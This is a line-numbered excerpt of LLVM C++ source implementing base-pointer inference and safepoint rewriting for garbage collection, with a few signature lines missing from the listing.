407  const bool IsKnownBase; 408  409  BaseDefiningValueResult(Value *BDV, bool IsKnownBase) 410  : BDV(BDV), IsKnownBase(IsKnownBase) { 411 #ifndef NDEBUG 412  // Check consistency between new and old means of checking whether a BDV is 413  // a base. 414  bool MustBeBase = isKnownBaseResult(BDV); 415  assert(!MustBeBase || MustBeBase == IsKnownBase); 416 #endif 417  } 418 }; 419  420 } // end anonymous namespace 421  422 static BaseDefiningValueResult findBaseDefiningValue(Value *I); 423  424 /// Return a base defining value for the 'Index' element of the given vector 425 /// instruction 'I'. If Index is null, returns a BDV for the entire vector 426 /// 'I'. As an optimization, this method will try to determine when the 427 /// element is known to already be a base pointer. If this can be established, 428 /// the second value in the returned pair will be true. Note that either a 429 /// vector or a pointer typed value can be returned. For the former, the 430 /// vector returned is a BDV (and possibly a base) of the entire vector 'I'. 431 /// If the later, the return pointer is a BDV (or possibly a base) for the 432 /// particular element in 'I'. 433 static BaseDefiningValueResult 435  // Each case parallels findBaseDefiningValue below, see that code for 436  // detailed motivation. 437  438  if (isa<Argument>(I)) 439  // An incoming argument to the function is a base pointer 440  return BaseDefiningValueResult(I, true); 441  442  if (isa<Constant>(I)) 443  // Base of constant vector consists only of constant null pointers. 444  // For reasoning see similar case inside 'findBaseDefiningValue' function. 445  return BaseDefiningValueResult(ConstantAggregateZero::get(I->getType()), 446  true); 447  448  if (isa<LoadInst>(I)) 449  return BaseDefiningValueResult(I, true); 450  451  if (isa<InsertElementInst>(I)) 452  // We don't know whether this vector contains entirely base pointers or 453  // not. To be conservatively correct, we treat it as a BDV and will 454  // duplicate code as needed to construct a parallel vector of bases. 455  return BaseDefiningValueResult(I, false); 456  457  if (isa<ShuffleVectorInst>(I)) 458  // We don't know whether this vector contains entirely base pointers or 459  // not. To be conservatively correct, we treat it as a BDV and will 460  // duplicate code as needed to construct a parallel vector of bases. 461  // TODO: There a number of local optimizations which could be applied here 462  // for particular sufflevector patterns. 463  return BaseDefiningValueResult(I, false); 464  465  // The behavior of getelementptr instructions is the same for vector and 466  // non-vector data types. 467  if (auto *GEP = dyn_cast<GetElementPtrInst>(I)) 468  return findBaseDefiningValue(GEP->getPointerOperand()); 469  470  // If the pointer comes through a bitcast of a vector of pointers to 471  // a vector of another type of pointer, then look through the bitcast 472  if (auto *BC = dyn_cast<BitCastInst>(I)) 473  return findBaseDefiningValue(BC->getOperand(0)); 474  475  // We assume that functions in the source language only return base 476  // pointers. This should probably be generalized via attributes to support 477  // both source language and internal functions. 478  if (isa<CallInst>(I) || isa<InvokeInst>(I)) 479  return BaseDefiningValueResult(I, true); 480  481  // A PHI or Select is a base defining value. The outer findBasePointer 482  // algorithm is responsible for constructing a base value for this BDV. 
483  assert((isa<SelectInst>(I) || isa<PHINode>(I)) && 484  "unknown vector instruction - no base found for vector element"); 485  return BaseDefiningValueResult(I, false); 486 } 487  488 /// Helper function for findBasePointer - Will return a value which either a) 489 /// defines the base pointer for the input, b) blocks the simple search 490 /// (i.e. a PHI or Select of two derived pointers), or c) involves a change 491 /// from pointer to vector type or back. 492 static BaseDefiningValueResult findBaseDefiningValue(Value *I) { 494  "Illegal to ask for the base pointer of a non-pointer type"); 495  496  if (I->getType()->isVectorTy()) 498  499  if (isa<Argument>(I)) 500  // An incoming argument to the function is a base pointer 501  // We should have never reached here if this argument isn't an gc value 502  return BaseDefiningValueResult(I, true); 503  504  if (isa<Constant>(I)) { 505  // We assume that objects with a constant base (e.g. a global) can't move 506  // and don't need to be reported to the collector because they are always 507  // live. Besides global references, all kinds of constants (e.g. undef, 508  // constant expressions, null pointers) can be introduced by the inliner or 509  // the optimizer, especially on dynamically dead paths. 510  // Here we treat all of them as having single null base. By doing this we 511  // trying to avoid problems reporting various conflicts in a form of 512  // "phi (const1, const2)" or "phi (const, regular gc ptr)". 513  // See constant.ll file for relevant test cases. 514  515  return BaseDefiningValueResult( 516  ConstantPointerNull::get(cast<PointerType>(I->getType())), true); 517  } 518  519  if (CastInst *CI = dyn_cast<CastInst>(I)) { 520  Value *Def = CI->stripPointerCasts(); 521  // If stripping pointer casts changes the address space there is an 522  // addrspacecast in between. 523  assert(cast<PointerType>(Def->getType())->getAddressSpace() == 524  cast<PointerType>(CI->getType())->getAddressSpace() && 525  "unsupported addrspacecast"); 526  // If we find a cast instruction here, it means we've found a cast which is 527  // not simply a pointer cast (i.e. an inttoptr). We don't know how to 528  // handle int->ptr conversion. 529  assert(!isa<CastInst>(Def) && "shouldn't find another cast here"); 530  return findBaseDefiningValue(Def); 531  } 532  533  if (isa<LoadInst>(I)) 534  // The value loaded is an gc base itself 535  return BaseDefiningValueResult(I, true); 536  537  if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(I)) 538  // The base of this GEP is the base 539  return findBaseDefiningValue(GEP->getPointerOperand()); 540  541  if (IntrinsicInst *II = dyn_cast<IntrinsicInst>(I)) { 542  switch (II->getIntrinsicID()) { 543  default: 544  // fall through to general call handling 545  break; 546  case Intrinsic::experimental_gc_statepoint: 547  llvm_unreachable("statepoints don't produce pointers"); 548  case Intrinsic::experimental_gc_relocate: 549  // Rerunning safepoint insertion after safepoints are already 550  // inserted is not supported. It could probably be made to work, 551  // but why are you doing this? There's no good reason. 552  llvm_unreachable("repeat safepoint insertion is not supported"); 553  case Intrinsic::gcroot: 554  // Currently, this mechanism hasn't been extended to work with gcroot. 555  // There's no reason it couldn't be, but I haven't thought about the 556  // implications much. 
558  "interaction with the gcroot mechanism is not supported"); 559  } 560  } 561  // We assume that functions in the source language only return base 562  // pointers. This should probably be generalized via attributes to support 563  // both source language and internal functions. 564  if (isa<CallInst>(I) || isa<InvokeInst>(I)) 565  return BaseDefiningValueResult(I, true); 566  567  // TODO: I have absolutely no idea how to implement this part yet. It's not 568  // necessarily hard, I just haven't really looked at it yet. 569  assert(!isa<LandingPadInst>(I) && "Landing Pad is unimplemented"); 570  571  if (isa<AtomicCmpXchgInst>(I)) 572  // A CAS is effectively a atomic store and load combined under a 573  // predicate. From the perspective of base pointers, we just treat it 574  // like a load. 575  return BaseDefiningValueResult(I, true); 576  577  assert(!isa<AtomicRMWInst>(I) && "Xchg handled above, all others are " 578  "binary ops which don't apply to pointers"); 579  580  // The aggregate ops. Aggregates can either be in the heap or on the 581  // stack, but in either case, this is simply a field load. As a result, 582  // this is a defining definition of the base just like a load is. 583  if (isa<ExtractValueInst>(I)) 584  return BaseDefiningValueResult(I, true); 585  586  // We should never see an insert vector since that would require we be 587  // tracing back a struct value not a pointer value. 588  assert(!isa<InsertValueInst>(I) && 589  "Base pointer for a struct is meaningless"); 590  591  // An extractelement produces a base result exactly when it's input does. 592  // We may need to insert a parallel instruction to extract the appropriate 593  // element out of the base vector corresponding to the input. Given this, 594  // it's analogous to the phi and select case even though it's not a merge. 595  if (isa<ExtractElementInst>(I)) 596  // Note: There a lot of obvious peephole cases here. This are deliberately 597  // handled after the main base pointer inference algorithm to make writing 598  // test cases to exercise that code easier. 599  return BaseDefiningValueResult(I, false); 600  601  // The last two cases here don't return a base pointer. Instead, they 602  // return a value which dynamically selects from among several base 603  // derived pointers (each with it's own base potentially). It's the job of 604  // the caller to resolve these. 605  assert((isa<SelectInst>(I) || isa<PHINode>(I)) && 606  "missing instruction case in findBaseDefiningValing"); 607  return BaseDefiningValueResult(I, false); 608 } 609  610 /// Returns the base defining value for this value. 612  Value *&Cached = Cache[I]; 613  if (!Cached) { 614  Cached = findBaseDefiningValue(I).BDV; 615  LLVM_DEBUG(dbgs() << "fBDV-cached: " << I->getName() << " -> " 616  << Cached->getName() << "\n"); 617  } 618  assert(Cache[I] != nullptr); 619  return Cached; 620 } 621  622 /// Return a base pointer for this value if known. Otherwise, return it's 623 /// base defining value. 626  auto Found = Cache.find(Def); 627  if (Found != Cache.end()) { 628  // Either a base-of relation, or a self reference. Caller must check. 629  return Found->second; 630  } 631  // Only a BDV available 632  return Def; 633 } 634  635 /// Given the result of a call to findBaseDefiningValue, or findBaseOrBDV, 636 /// is it known to be a base pointer? Or do we need to continue searching. 
637 static bool isKnownBaseResult(Value *V) { 638  if (!isa<PHINode>(V) && !isa<SelectInst>(V) && 639  !isa<ExtractElementInst>(V) && !isa<InsertElementInst>(V) && 640  !isa<ShuffleVectorInst>(V)) { 641  // no recursion possible 642  return true; 643  } 644  if (isa<Instruction>(V) && 645  cast<Instruction>(V)->getMetadata("is_base_value")) { 646  // This is a previously inserted base phi or select. We know 647  // that this is a base value. 648  return true; 649  } 650  651  // We need to keep searching 652  return false; 653 } 654  655 namespace { 656  657 /// Models the state of a single base defining value in the findBasePointer 658 /// algorithm for determining where a new instruction is needed to propagate 659 /// the base of this BDV. 660 class BDVState { 661 public: 662  enum Status { Unknown, Base, Conflict }; 663  664  BDVState() : BaseValue(nullptr) {} 665  666  explicit BDVState(Status Status, Value *BaseValue = nullptr) 667  : Status(Status), BaseValue(BaseValue) { 668  assert(Status != Base || BaseValue); 669  } 670  671  explicit BDVState(Value *BaseValue) : Status(Base), BaseValue(BaseValue) {} 672  673  Status getStatus() const { return Status; } 674  Value *getBaseValue() const { return BaseValue; } 675  676  bool isBase() const { return getStatus() == Base; } 677  bool isUnknown() const { return getStatus() == Unknown; } 678  bool isConflict() const { return getStatus() == Conflict; } 679  680  bool operator==(const BDVState &Other) const { 681  return BaseValue == Other.BaseValue && Status == Other.Status; 682  } 683  684  bool operator!=(const BDVState &other) const { return !(*this == other); } 685  687  void dump() const { 688  print(dbgs()); 689  dbgs() << '\n'; 690  } 691  692  void print(raw_ostream &OS) const { 693  switch (getStatus()) { 694  case Unknown: 695  OS << "U"; 696  break; 697  case Base: 698  OS << "B"; 699  break; 700  case Conflict: 701  OS << "C"; 702  break; 703  } 704  OS << " (" << getBaseValue() << " - " 705  << (getBaseValue() ? getBaseValue()->getName() : "nullptr") << "): "; 706  } 707  708 private: 709  Status Status = Unknown; 710  AssertingVH<Value> BaseValue; // Non-null only if Status == Base. 711 }; 712  713 } // end anonymous namespace 714  715 #ifndef NDEBUG 716 static raw_ostream &operator<<(raw_ostream &OS, const BDVState &State) { 717  State.print(OS); 718  return OS; 719 } 720 #endif 721  722 static BDVState meetBDVStateImpl(const BDVState &LHS, const BDVState &RHS) { 723  switch (LHS.getStatus()) { 724  case BDVState::Unknown: 725  return RHS; 726  727  case BDVState::Base: 728  assert(LHS.getBaseValue() && "can't be null"); 729  if (RHS.isUnknown()) 730  return LHS; 731  732  if (RHS.isBase()) { 733  if (LHS.getBaseValue() == RHS.getBaseValue()) { 734  assert(LHS == RHS && "equality broken!"); 735  return LHS; 736  } 737  return BDVState(BDVState::Conflict); 738  } 739  assert(RHS.isConflict() && "only three states!"); 740  return BDVState(BDVState::Conflict); 741  742  case BDVState::Conflict: 743  return LHS; 744  } 745  llvm_unreachable("only three states!"); 746 } 747  748 // Values of type BDVState form a lattice, and this function implements the meet 749 // operation. 750 static BDVState meetBDVState(const BDVState &LHS, const BDVState &RHS) { 751  BDVState Result = meetBDVStateImpl(LHS, RHS); 752  assert(Result == meetBDVStateImpl(RHS, LHS) && 753  "Math is wrong: meet does not commute!"); 754  return Result; 755 } 756  757 /// For a given value or instruction, figure out what base ptr its derived from. 
758 /// For gc objects, this is simply itself. On success, returns a value which is 759 /// the base pointer. (This is reliable and can be used for relocation.) On 760 /// failure, returns nullptr. 762  Value *Def = findBaseOrBDV(I, Cache); 763  764  if (isKnownBaseResult(Def)) 765  return Def; 766  767  // Here's the rough algorithm: 768  // - For every SSA value, construct a mapping to either an actual base 769  // pointer or a PHI which obscures the base pointer. 770  // - Construct a mapping from PHI to unknown TOP state. Use an 771  // optimistic algorithm to propagate base pointer information. Lattice 772  // looks like: 773  // UNKNOWN 774  // b1 b2 b3 b4 775  // CONFLICT 776  // When algorithm terminates, all PHIs will either have a single concrete 777  // base or be in a conflict state. 778  // - For every conflict, insert a dummy PHI node without arguments. Add 779  // these to the base[Instruction] = BasePtr mapping. For every 780  // non-conflict, add the actual base. 781  // - For every conflict, add arguments for the base[a] of each input 782  // arguments. 783  // 784  // Note: A simpler form of this would be to add the conflict form of all 785  // PHIs without running the optimistic algorithm. This would be 786  // analogous to pessimistic data flow and would likely lead to an 787  // overall worse solution. 788  789 #ifndef NDEBUG 790  auto isExpectedBDVType = [](Value *BDV) { 791  return isa<PHINode>(BDV) || isa<SelectInst>(BDV) || 792  isa<ExtractElementInst>(BDV) || isa<InsertElementInst>(BDV) || 793  isa<ShuffleVectorInst>(BDV); 794  }; 795 #endif 796  797  // Once populated, will contain a mapping from each potentially non-base BDV 798  // to a lattice value (described above) which corresponds to that BDV. 799  // We use the order of insertion (DFS over the def/use graph) to provide a 800  // stable deterministic ordering for visiting DenseMaps (which are unordered) 801  // below. This is important for deterministic compilation. 
803  804  // Recursively fill in all base defining values reachable from the initial 805  // one for which we don't already know a definite base value for 806  /* scope */ { 807  SmallVector<Value*, 16> Worklist; 808  Worklist.push_back(Def); 809  States.insert({Def, BDVState()}); 810  while (!Worklist.empty()) { 811  Value *Current = Worklist.pop_back_val(); 812  assert(!isKnownBaseResult(Current) && "why did it get added?"); 813  814  auto visitIncomingValue = [&](Value *InVal) { 815  Value *Base = findBaseOrBDV(InVal, Cache); 816  if (isKnownBaseResult(Base)) 817  // Known bases won't need new instructions introduced and can be 818  // ignored safely 819  return; 820  assert(isExpectedBDVType(Base) && "the only non-base values " 821  "we see should be base defining values"); 822  if (States.insert(std::make_pair(Base, BDVState())).second) 823  Worklist.push_back(Base); 824  }; 825  if (PHINode *PN = dyn_cast<PHINode>(Current)) { 826  for (Value *InVal : PN->incoming_values()) 827  visitIncomingValue(InVal); 828  } else if (SelectInst *SI = dyn_cast<SelectInst>(Current)) { 829  visitIncomingValue(SI->getTrueValue()); 830  visitIncomingValue(SI->getFalseValue()); 831  } else if (auto *EE = dyn_cast<ExtractElementInst>(Current)) { 832  visitIncomingValue(EE->getVectorOperand()); 833  } else if (auto *IE = dyn_cast<InsertElementInst>(Current)) { 834  visitIncomingValue(IE->getOperand(0)); // vector operand 835  visitIncomingValue(IE->getOperand(1)); // scalar operand 836  } else if (auto *SV = dyn_cast<ShuffleVectorInst>(Current)) { 837  visitIncomingValue(SV->getOperand(0)); 838  visitIncomingValue(SV->getOperand(1)); 839  } 840  else { 841  llvm_unreachable("Unimplemented instruction case"); 842  } 843  } 844  } 845  846 #ifndef NDEBUG 847  LLVM_DEBUG(dbgs() << "States after initialization:\n"); 848  for (auto Pair : States) { 849  LLVM_DEBUG(dbgs() << " " << Pair.second << " for " << *Pair.first << "\n"); 850  } 851 #endif 852  853  // Return a phi state for a base defining value. We'll generate a new 854  // base state for known bases and expect to find a cached state otherwise. 855  auto getStateForBDV = [&](Value *baseValue) { 856  if (isKnownBaseResult(baseValue)) 857  return BDVState(baseValue); 858  auto I = States.find(baseValue); 859  assert(I != States.end() && "lookup failed!"); 860  return I->second; 861  }; 862  863  bool Progress = true; 864  while (Progress) { 865 #ifndef NDEBUG 866  const size_t OldSize = States.size(); 867 #endif 868  Progress = false; 869  // We're only changing values in this loop, thus safe to keep iterators. 870  // Since this is computing a fixed point, the order of visit does not 871  // effect the result. TODO: We could use a worklist here and make this run 872  // much faster. 873  for (auto Pair : States) { 874  Value *BDV = Pair.first; 875  assert(!isKnownBaseResult(BDV) && "why did it get added?"); 876  877  // Given an input value for the current instruction, return a BDVState 878  // instance which represents the BDV of that value. 
879  auto getStateForInput = [&](Value *V) mutable { 880  Value *BDV = findBaseOrBDV(V, Cache); 881  return getStateForBDV(BDV); 882  }; 883  884  BDVState NewState; 885  if (SelectInst *SI = dyn_cast<SelectInst>(BDV)) { 886  NewState = meetBDVState(NewState, getStateForInput(SI->getTrueValue())); 887  NewState = 888  meetBDVState(NewState, getStateForInput(SI->getFalseValue())); 889  } else if (PHINode *PN = dyn_cast<PHINode>(BDV)) { 890  for (Value *Val : PN->incoming_values()) 891  NewState = meetBDVState(NewState, getStateForInput(Val)); 892  } else if (auto *EE = dyn_cast<ExtractElementInst>(BDV)) { 893  // The 'meet' for an extractelement is slightly trivial, but it's still 894  // useful in that it drives us to conflict if our input is. 895  NewState = 896  meetBDVState(NewState, getStateForInput(EE->getVectorOperand())); 897  } else if (auto *IE = dyn_cast<InsertElementInst>(BDV)){ 898  // Given there's a inherent type mismatch between the operands, will 899  // *always* produce Conflict. 900  NewState = meetBDVState(NewState, getStateForInput(IE->getOperand(0))); 901  NewState = meetBDVState(NewState, getStateForInput(IE->getOperand(1))); 902  } else { 903  // The only instance this does not return a Conflict is when both the 904  // vector operands are the same vector. 905  auto *SV = cast<ShuffleVectorInst>(BDV); 906  NewState = meetBDVState(NewState, getStateForInput(SV->getOperand(0))); 907  NewState = meetBDVState(NewState, getStateForInput(SV->getOperand(1))); 908  } 909  910  BDVState OldState = States[BDV]; 911  if (OldState != NewState) { 912  Progress = true; 913  States[BDV] = NewState; 914  } 915  } 916  917  assert(OldSize == States.size() && 918  "fixed point shouldn't be adding any new nodes to state"); 919  } 920  921 #ifndef NDEBUG 922  LLVM_DEBUG(dbgs() << "States after meet iteration:\n"); 923  for (auto Pair : States) { 924  LLVM_DEBUG(dbgs() << " " << Pair.second << " for " << *Pair.first << "\n"); 925  } 926 #endif 927  928  // Insert Phis for all conflicts 929  // TODO: adjust naming patterns to avoid this order of iteration dependency 930  for (auto Pair : States) { 931  Instruction *I = cast<Instruction>(Pair.first); 932  BDVState State = Pair.second; 933  assert(!isKnownBaseResult(I) && "why did it get added?"); 934  assert(!State.isUnknown() && "Optimistic algorithm didn't complete!"); 935  936  // extractelement instructions are a bit special in that we may need to 937  // insert an extract even when we know an exact base for the instruction. 938  // The problem is that we need to convert from a vector base to a scalar 939  // base for the particular indice we're interested in. 940  if (State.isBase() && isa<ExtractElementInst>(I) && 941  isa<VectorType>(State.getBaseValue()->getType())) { 942  auto *EE = cast<ExtractElementInst>(I); 943  // TODO: In many cases, the new instruction is just EE itself. We should 944  // exploit this, but can't do it here since it would break the invariant 945  // about the BDV not being known to be a base. 946  auto *BaseInst = ExtractElementInst::Create( 947  State.getBaseValue(), EE->getIndexOperand(), "base_ee", EE); 948  BaseInst->setMetadata("is_base_value", MDNode::get(I->getContext(), {})); 949  States[I] = BDVState(BDVState::Base, BaseInst); 950  } 951  952  // Since we're joining a vector and scalar base, they can never be the 953  // same. As a result, we should always see insert element having reached 954  // the conflict state. 
  assert(!isa<InsertElementInst>(I) || State.isConflict());

  if (!State.isConflict())
    continue;

  /// Create and insert a new instruction which will represent the base of
  /// the given instruction 'I'.
  auto MakeBaseInstPlaceholder = [](Instruction *I) -> Instruction* {
    if (isa<PHINode>(I)) {
      BasicBlock *BB = I->getParent();
      int NumPreds = pred_size(BB);
      assert(NumPreds > 0 && "how did we reach here");
      std::string Name = suffixed_name_or(I, ".base", "base_phi");
      return PHINode::Create(I->getType(), NumPreds, Name, I);
    } else if (SelectInst *SI = dyn_cast<SelectInst>(I)) {
      // The undef will be replaced later
      UndefValue *Undef = UndefValue::get(SI->getType());
      std::string Name = suffixed_name_or(I, ".base", "base_select");
      return SelectInst::Create(SI->getCondition(), Undef, Undef, Name, SI);
    } else if (auto *EE = dyn_cast<ExtractElementInst>(I)) {
      UndefValue *Undef = UndefValue::get(EE->getVectorOperand()->getType());
      std::string Name = suffixed_name_or(I, ".base", "base_ee");
      return ExtractElementInst::Create(Undef, EE->getIndexOperand(), Name,
                                        EE);
    } else if (auto *IE = dyn_cast<InsertElementInst>(I)) {
      UndefValue *VecUndef = UndefValue::get(IE->getOperand(0)->getType());
      UndefValue *ScalarUndef = UndefValue::get(IE->getOperand(1)->getType());
      std::string Name = suffixed_name_or(I, ".base", "base_ie");
      return InsertElementInst::Create(VecUndef, ScalarUndef,
                                       IE->getOperand(2), Name, IE);
    } else {
      auto *SV = cast<ShuffleVectorInst>(I);
      UndefValue *VecUndef = UndefValue::get(SV->getOperand(0)->getType());
      std::string Name = suffixed_name_or(I, ".base", "base_sv");
      return new ShuffleVectorInst(VecUndef, VecUndef, SV->getOperand(2),
                                   Name, SV);
    }
  };
  Instruction *BaseInst = MakeBaseInstPlaceholder(I);
  // Add metadata marking this as a base value
  BaseInst->setMetadata("is_base_value", MDNode::get(I->getContext(), {}));
  States[I] = BDVState(BDVState::Conflict, BaseInst);
}

// Returns an instruction which produces the base pointer for a given
// instruction. The instruction is assumed to be an input to one of the BDVs
// seen in the inference algorithm above. As such, we must either already
// know its base defining value is a base, or have inserted a new
// instruction to propagate the base of its BDV and have entered that newly
// introduced instruction into the state table. In either case, we are
// assured to be able to determine an instruction which produces its base
// pointer.
auto getBaseForInput = [&](Value *Input, Instruction *InsertPt) {
  Value *BDV = findBaseOrBDV(Input, Cache);
  Value *Base = nullptr;
  if (isKnownBaseResult(BDV)) {
    Base = BDV;
  } else {
    // Either conflict or base.
    assert(States.count(BDV));
    Base = States[BDV].getBaseValue();
  }
  assert(Base && "Can't be null");
  // The cast is needed since base traversal may strip away bitcasts
  if (Base->getType() != Input->getType() && InsertPt)
    Base = new BitCastInst(Base, Input->getType(), "cast", InsertPt);
  return Base;
};

// Fixup all the inputs of the new PHIs. Visit order needs to be
// deterministic and predictable because we're naming newly created
// instructions.
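// For illustration (a hypothetical example, not from the surrounding code):
// a conflict phi such as
//   %merge = phi i8 addrspace(1)* [ %a.derived, %left ], [ %b.derived, %right ]
// has, at this point, an empty placeholder
//   %merge.base = phi i8 addrspace(1)* ...
// The loop below fills in the placeholder's operands so it becomes
//   %merge.base = phi i8 addrspace(1)* [ %a, %left ], [ %b, %right ]
// where %a and %b are the bases computed for the corresponding incoming values.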
for (auto Pair : States) {
  Instruction *BDV = cast<Instruction>(Pair.first);
  BDVState State = Pair.second;

  assert(!isKnownBaseResult(BDV) && "why did it get added?");
  assert(!State.isUnknown() && "Optimistic algorithm didn't complete!");
  if (!State.isConflict())
    continue;

  if (PHINode *BasePHI = dyn_cast<PHINode>(State.getBaseValue())) {
    PHINode *PN = cast<PHINode>(BDV);
    unsigned NumPHIValues = PN->getNumIncomingValues();
    for (unsigned i = 0; i < NumPHIValues; i++) {
      Value *InVal = PN->getIncomingValue(i);
      BasicBlock *InBB = PN->getIncomingBlock(i);

      // If we've already seen InBB, add the same incoming value
      // we added for it earlier. The IR verifier requires phi
      // nodes with multiple entries from the same basic block
      // to have the same incoming value for each of those
      // entries. If we don't do this check here and basephi
      // has a different type than base, we'll end up adding two
      // bitcasts (and hence two distinct values) as incoming
      // values for the same basic block.

      int BlockIndex = BasePHI->getBasicBlockIndex(InBB);
      if (BlockIndex != -1) {
        Value *OldBase = BasePHI->getIncomingValue(BlockIndex);
        BasePHI->addIncoming(OldBase, InBB);

#ifndef NDEBUG
        Value *Base = getBaseForInput(InVal, nullptr);
        // In essence this assert states: the only way two values
        // incoming from the same basic block may be different is by
        // being different bitcasts of the same value. A cleanup
        // that remains TODO is changing findBaseOrBDV to return an
        // llvm::Value of the correct type (and still remain pure).
        // This will remove the need to add bitcasts.
        assert(Base->stripPointerCasts() == OldBase->stripPointerCasts() &&
               "Sanity -- findBaseOrBDV should be pure!");
#endif
        continue;
      }

      // Find the instruction which produces the base for each input. We may
      // need to insert a bitcast in the incoming block.
      // TODO: Need to split critical edges if insertion is needed
      Value *Base = getBaseForInput(InVal, InBB->getTerminator());
      BasePHI->addIncoming(Base, InBB);
    }
    assert(BasePHI->getNumIncomingValues() == NumPHIValues);
  } else if (SelectInst *BaseSI =
                 dyn_cast<SelectInst>(State.getBaseValue())) {
    SelectInst *SI = cast<SelectInst>(BDV);

    // Find the instruction which produces the base for each input.
    // We may need to insert a bitcast.
    BaseSI->setTrueValue(getBaseForInput(SI->getTrueValue(), BaseSI));
    BaseSI->setFalseValue(getBaseForInput(SI->getFalseValue(), BaseSI));
  } else if (auto *BaseEE =
                 dyn_cast<ExtractElementInst>(State.getBaseValue())) {
    Value *InVal = cast<ExtractElementInst>(BDV)->getVectorOperand();
    // Find the instruction which produces the base for each input. We may
    // need to insert a bitcast.
    BaseEE->setOperand(0, getBaseForInput(InVal, BaseEE));
  } else if (auto *BaseIE =
                 dyn_cast<InsertElementInst>(State.getBaseValue())) {
    auto *BdvIE = cast<InsertElementInst>(BDV);
    auto UpdateOperand = [&](int OperandIdx) {
      Value *InVal = BdvIE->getOperand(OperandIdx);
      Value *Base = getBaseForInput(InVal, BaseIE);
      BaseIE->setOperand(OperandIdx, Base);
    };
    UpdateOperand(0); // vector operand
    UpdateOperand(1); // scalar operand
  } else {
    auto *BaseSV = cast<ShuffleVectorInst>(State.getBaseValue());
    auto *BdvSV = cast<ShuffleVectorInst>(BDV);
    auto UpdateOperand = [&](int OperandIdx) {
      Value *InVal = BdvSV->getOperand(OperandIdx);
      Value *Base = getBaseForInput(InVal, BaseSV);
      BaseSV->setOperand(OperandIdx, Base);
    };
    UpdateOperand(0); // vector operand
    UpdateOperand(1); // vector operand
  }
}

// Cache all of our results so we can cheaply reuse them
// NOTE: This is actually two caches: one of the base defining value
// relation and one of the base pointer relation! FIXME
for (auto Pair : States) {
  auto *BDV = Pair.first;
  Value *Base = Pair.second.getBaseValue();
  assert(BDV && Base);
  assert(!isKnownBaseResult(BDV) && "why did it get added?");

  LLVM_DEBUG(
      dbgs() << "Updating base value cache"
             << " for: " << BDV->getName() << " from: "
             << (Cache.count(BDV) ? Cache[BDV]->getName().str() : "none")
             << " to: " << Base->getName() << "\n");

  if (Cache.count(BDV)) {
    assert(isKnownBaseResult(Base) &&
           "must be something we 'know' is a base pointer");
    // Once we transition from the BDV relation being stored in the Cache to
    // the base relation being stored, it must be stable
    assert((!isKnownBaseResult(Cache[BDV]) || Cache[BDV] == Base) &&
           "base relation should be stable");
  }
  Cache[BDV] = Base;
}
assert(Cache.count(Def));
return Cache[Def];
}

// For a set of live pointers (base and/or derived), identify the base
// pointer of the object which they are derived from. This routine will
// mutate the IR graph as needed to make the 'base' pointer live at the
// definition site of 'derived'. This ensures that any use of 'derived' can
// also use 'base'. This may involve the insertion of a number of
// additional PHI nodes.
//
// preconditions: live is a set of pointer type Values
//
// side effects: may insert PHI nodes into the existing CFG, will preserve
// CFG, will not remove or mutate any existing nodes
//
// post condition: PointerToBase contains one (derived, base) pair for every
// pointer in live. Note that derived can be equal to base if the original
// pointer was a base pointer.
static void
findBasePointers(const StatepointLiveSetTy &live,
                 MapVector<Value *, Value *> &PointerToBase,
                 DominatorTree *DT, DefiningValueMapTy &DVCache) {
  for (Value *ptr : live) {
    Value *base = findBasePointer(ptr, DVCache);
    assert(base && "failed to find base pointer");
    PointerToBase[ptr] = base;
    assert((!isa<Instruction>(base) || !isa<Instruction>(ptr) ||
            DT->dominates(cast<Instruction>(base)->getParent(),
                          cast<Instruction>(ptr)->getParent())) &&
           "The base we found better dominate the derived pointer");
  }
}

/// Find the required base pointers (and adjust the live set) for the given
/// parse point.
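// For example (hypothetical names), given a live set { %obj, %gep } where
//   %gep = getelementptr i8, i8 addrspace(1)* %obj, i64 16
// the resulting map is { %obj -> %obj, %gep -> %obj }: a base pointer is its
// own base, while a derived pointer maps to the base it was computed from.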
static void findBasePointers(DominatorTree &DT, DefiningValueMapTy &DVCache,
                             CallBase *Call,
                             PartiallyConstructedSafepointRecord &result) {
  MapVector<Value *, Value *> PointerToBase;
  findBasePointers(result.LiveSet, PointerToBase, &DT, DVCache);

  if (PrintBasePointers) {
    errs() << "Base Pairs (w/o Relocation):\n";
    for (auto &Pair : PointerToBase) {
      errs() << " derived ";
      Pair.first->printAsOperand(errs(), false);
      errs() << " base ";
      Pair.second->printAsOperand(errs(), false);
      errs() << "\n";
    }
  }

  result.PointerToBase = PointerToBase;
}

/// Given an updated version of the dataflow liveness results, update the
/// liveset and base pointer maps for the call site CS.
static void recomputeLiveInValues(GCPtrLivenessData &RevisedLivenessData,
                                  CallBase *Call,
                                  PartiallyConstructedSafepointRecord &result);

static void recomputeLiveInValues(
    Function &F, DominatorTree &DT, ArrayRef<CallBase *> toUpdate,
    MutableArrayRef<struct PartiallyConstructedSafepointRecord> records) {
  // TODO-PERF: reuse the original liveness, then simply run the dataflow
  // again. The old values are still live and will help it stabilize quickly.
  GCPtrLivenessData RevisedLivenessData;
  computeLiveInValues(DT, F, RevisedLivenessData);
  for (size_t i = 0; i < records.size(); i++) {
    struct PartiallyConstructedSafepointRecord &info = records[i];
    recomputeLiveInValues(RevisedLivenessData, toUpdate[i], info);
  }
}

// When inserting gc.relocate and gc.result calls, we need to ensure there are
// no uses of the original value / return value between the gc.statepoint and
// the gc.relocate / gc.result call. One case which can arise is a phi node
// starting one of the successor blocks. We also need to be able to insert the
// gc.relocates only on the path which goes through the statepoint. We might
// need to split an edge to make this possible.
static BasicBlock *
normalizeForInvokeSafepoint(BasicBlock *BB, BasicBlock *InvokeParent,
                            DominatorTree &DT) {
  BasicBlock *Ret = BB;
  if (!BB->getUniquePredecessor())
    Ret = SplitBlockPredecessors(BB, InvokeParent, "", &DT);

  // Now that 'Ret' has unique predecessor we can safely remove all phi nodes
  // from it
  FoldSingleEntryPHINodes(Ret);
  assert(!isa<PHINode>(Ret->begin()) &&
         "All PHI nodes should have been removed!");

  // At this point, we can safely insert a gc.relocate or gc.result as the first
  // instruction in Ret if needed.
  return Ret;
}

// Create new attribute set containing only attributes which can be transferred
// from original call to the safepoint.
static AttributeList legalizeCallAttributes(AttributeList AL) {
  if (AL.isEmpty())
    return AL;

  // Remove the readonly, readnone, and statepoint function attributes.
  AttrBuilder FnAttrs = AL.getFnAttributes();
  FnAttrs.removeAttribute(Attribute::ReadNone);
  FnAttrs.removeAttribute(Attribute::ReadOnly);
  for (Attribute A : AL.getFnAttributes()) {
    if (isStatepointDirectiveAttr(A))
      FnAttrs.remove(A);
  }

  // Just skip parameter and return attributes for now
